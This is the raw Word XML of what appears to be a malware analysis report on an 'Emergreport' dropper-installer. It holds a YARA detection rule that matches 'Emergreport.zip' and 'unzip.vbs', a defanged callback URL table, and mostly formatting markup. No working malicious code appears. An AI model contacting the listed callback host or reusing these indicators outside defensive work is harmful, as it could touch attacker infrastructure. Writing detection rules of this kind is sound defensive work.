          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f1fa8c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"2023-11-11"</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author = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f1fa8c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"AcePhire"</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description = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f1fa8c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"A Yara rule for Emergreport.Dropper.Installer.msi"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282a36"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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color w:val="ff79c6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</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i/>
          <w:iCs/>
          <w:color w:val="ffb86c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$zip_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f1fa8c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"Emergreport.zip"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="ff79c6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ascii</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i/>
          <w:iCs/>
          <w:color w:val="ffb86c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$unzipper_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f1fa8c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"unzip.vbs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f1fa8c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282a36"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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color w:val="ff79c6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</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i/>
          <w:iCs/>
          <w:color w:val="ffb86c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$zip_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="ff79c6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and</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 xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="ffb86c"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$unzipper_file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282a36"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
          <w:color w:val="f8f8f2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc85208009"/>
      <w:r>
        <w:t>Callback URLs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4Accent5"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4675"/>
        <w:gridCol w:w="4675"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="101000000000"/>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="100000000000"/>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000100000"/>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>hxxp://</w:t>
            </w:r>
            <w:r>
              <w:t>consumerfinancereport[</w:t>
            </w:r>
            <w:r>
              <w:t>.]local</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000100000"/>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId51"/>
      <w:footerReference w:type="default" r:id="rId5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Montserrat Medium">
    <w:panose1 w:val="00000600000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="2000020f" w:usb1="00000003" w:usb2="00000000" w:usb3="00000000" w:csb0="00000197" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020b0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="00000000" w:usb1="0000fcff" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019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jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:t>Emergreport</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:t>Dropper</w:t>
    </w:r>
    <w:r>
      <w:t>-</w:t>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">Installer </w:t>
    </w:r>
    <w:r>
      <w:t>Malware</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:t>Nov 2023</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:t>v1.0</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r>
        <w:rPr/>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p>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jc w:val="right"/>
      <w:rPr/>
    </w:pPr>
    <w:r>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margin">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>784860</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7056120" cy="0"/>
              <wp:effectExtent l="0" t="0" r="0" b="6350"/>
              <wp:wrapNone/>
              <wp:docPr id="4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Pr id="2" name="Straight Connector 2"/>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm flipH="1">
                        <a:off x="0" y="0"/>
                        <a:ext cx="7056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7B13A6E-FC10-F57A-35AD9E3E7268" coordsize="21600,21600" style="flip:x;position:absolute;width:10pt;height:10pt;mso-width-percent:0;mso-width-relative:margin;margin-top:0pt;margin-left:0pt;mso-wrap-distance-left:9pt;mso-wrap-distance-right:9pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;mso-position-horizontal:center;mso-position-horizontal-relative:margin;rotation:0.000000;z-index:251659264;" strokecolor="#4472c4" strokeweight="0.5pt" o:spt="32" o:oned="t" path="m0,0 l21600,21600 e">
              <v:stroke color="#4472c4" filltype="solid" joinstyle="miter" linestyle="single" mitterlimit="800000" weight="0.5pt"/>
              <w10:wrap side="both"/>
              <o:lock/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:drawing xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="822586" cy="732155"/>
          <wp:effectExtent l="0" t="0" r="0"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
                  <a:srcRect/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="822586" cy="732155"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:noFill/>
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>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cs="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:isLgl w:val="off"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">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27"/>
    <w:rsid w:val="0000714D"/>
    <w:rsid w:val="00033B0B"/>
    <w:rsid w:val="0005795C"/>
    <w:rsid w:val="00124742"/>
    <w:rsid w:val="00136992"/>
    <w:rsid w:val="001B1896"/>
    <w:rsid w:val="00200E09"/>
    <w:rsid w:val="00201CF7"/>
    <w:rsid w:val="00324290"/>
    <w:rsid w:val="003D280B"/>
    <w:rsid w:val="003E1DA1"/>
    <w:rsid w:val="00480604"/>
    <w:rsid w:val="00491543"/>
    <w:rsid w:val="004E000A"/>
    <w:rsid w:val="004F1E87"/>
    <w:rsid w:val="00516D33"/>
    <w:rsid w:val="00551809"/>
    <w:rsid w:val="005D5761"/>
    <w:rsid w:val="005F08C6"/>
    <w:rsid w:val="00635627"/>
    <w:rsid w:val="00683CD5"/>
    <w:rsid w:val="006D6D92"/>
    <w:rsid w:val="00811599"/>
    <w:rsid w:val="00942A2A"/>
    <w:rsid w:val="009B4982"/>
    <w:rsid w:val="009D598D"/>
    <w:rsid w:val="00B81CF3"/>
    <w:rsid w:val="00BD75A3"/>
    <w:rsid w:val="00C424D4"/>
    <w:rsid w:val="00E20896"/>
    <w:rsid w:val="00E32A25"/>
    <w:rsid w:val="00F0342B"/>
    <w:rsid w:val="00F54E18"/>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A1E61"/>
  <w15:chartTrackingRefBased/>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pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:keepNext w:val="on"/>
      <w:keepLines w:val="on"/>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:qFormat w:val="on"/>
    <w:pPr>
      <w:keepNext w:val="on"/>
      <w:keepLines w:val="on"/>
      <w:spacing w:before="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
      <w:color w:val="2f5395" w:themeColor="accent1" w:themeShade="bf"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>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basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
      <w:b/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:rPr>
      <w:color w:val="0563c1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Toc1">
    <w:name w:val="Toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="40"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Toc2">
    <w:name w:val="Toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Toc3">
    <w:name w:val="Toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:semiHidden w:val="on"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="10070"/>
      </w:tabs>
      <w:spacing w:after="60"/>
      <w:ind w:left="403"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="Header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="on"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rPr>
      <w:rFonts w:ascii="Montserrat Medium" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Montserrat Medium"/>
      <w:color w:val="2f5395" w:themeColor="accent1" w:themeShade="bf"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:link w:val="NoSpacingChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat w:val="on"/>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val="on"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing w:val="on"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable1Light">
    <w:name w:val="Grid Table 1 Light"/>
    <w:basedOn w:val="NormalTable"/>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2Accent5">
    <w:name w:val="Grid Table 2 Accent 5"/>
    <w:basedOn w:val="NormalTable"/>
    <w:uiPriority w:val="47"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="2" w:space="0"/>
        <w:bottom w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="2" w:space="0"/>
        <w:insideH w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="2" w:space="0"/>
        <w:insideV w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="2" w:space="0"/>
      </w:tblBorders>
    </w:tblPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="nil" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="12" w:space="0"/>
          <w:insideH w:val="nil" w:sz="4" w:space="0"/>
          <w:insideV w:val="nil" w:sz="4" w:space="0"/>
        </w:tcBorders>
        <w:shd w:val="clear" w:color="auto" w:fill="ffffff" w:themeFill="background1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="lastRow">
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="9cc3e6" w:themeColor="accent5"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deebf6" w:themeFill="accent5" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="deebf6" w:themeFill="accent5" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable5DarkAccent1">
    <w:name w:val="Grid Table 5 Dark Accent 1"/>
    <w:basedOn w:val="NormalTable"/>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4472c4" w:themeFill="accent1"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Vert">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="b3c6e7" w:themeFill="accent1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="b3c6e7" w:themeFill="accent1" w:themeFillTint="66"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4Accent1">
    <w:name w:val="Grid Table 4 Accent 1"/>
    <w:basedOn w:val="NormalTable"/>
    <w:uiPriority w:val="49"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:color="8eaadc" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:left w:val="single" w:color="8eaadc" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="8eaadc" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="8eaadc" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:insideH w:val="single" w:color="8eaadc" w:themeColor="accent1" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:insideV w:val="single" w:color="8eaadc"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4" w:space="0"/>
          <w:insideV w:val="nil" w:sz="4"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NormalTable"/>
    <w:uiPriority w:val="49"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblStyleColBandSize w:val="1"/>
      <w:tblBorders>
        <w:top w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:left w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:bottom w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:right w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:insideH w:val="single" w:color="9cc3e6" w:themeColor="accent5" w:themeTint="99" w:sz="4" w:space="0"/>
        <w:insideV w:val="single" w:color="9cc3e6"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sz="4" w:space="0"/>
          <w:insideV w:val="nil" w:sz="4" w:space="0"/>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bf6" w:themeFill="accent5" w:themeFillTint="33"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="deeb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1311">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="537592943">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="283300">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
